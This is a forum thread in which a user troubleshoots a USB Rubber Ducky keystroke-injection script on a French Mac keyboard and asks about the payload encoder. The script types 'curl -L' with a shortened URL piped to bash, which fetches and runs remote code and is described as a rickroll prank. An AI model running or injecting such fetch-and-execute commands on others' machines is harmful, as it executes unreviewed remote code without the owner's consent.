Jump to content

[Bug][Encoder] 'Pipe' Symbol on a french Mac keyboard


Recommended Posts

Posted (edited)

Hi Everyone,

I'm trying to use a pipe symbol ( | ) on a french mac keyboard.

The key combination to do it is Shift+Alt+L

What I want to print in a terminal is :

curl -L http://bit.ly/10hA8iC | bash

(which by the way is really fun, it plays a rickroll inside the mac terminal ! )

All my script is working great, but the only issue is that pipe symbol.

I've tried several things, like :

STRING curl -L http://bit.ly/10hA8iC | bash

or

STRING curl -s -L http://bit.ly/10hA8iC
SPACE
DELAY 20
ALT-SHIFT l
DELAY 20
SPACE
DELAY 20
STRING bash
DELAY 50
ENTER

I saw a forum post saying that maybe the rubberducky can't handle 3 key combination, so I don't know...

If anyone has an idea or at least the same pb...

Maybe I'm missing something obvious here, so excuse me for my noobness (& my english ! )

Thanks a lot

Wook

Edited by WooK
Posted

I can't get french mac keyboard work ...

I'm using this command to encode my text file :

 java -jar encoder.jar -l resources/fr.properties -i textedit.txt -o inject.bin

any idea please ?

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...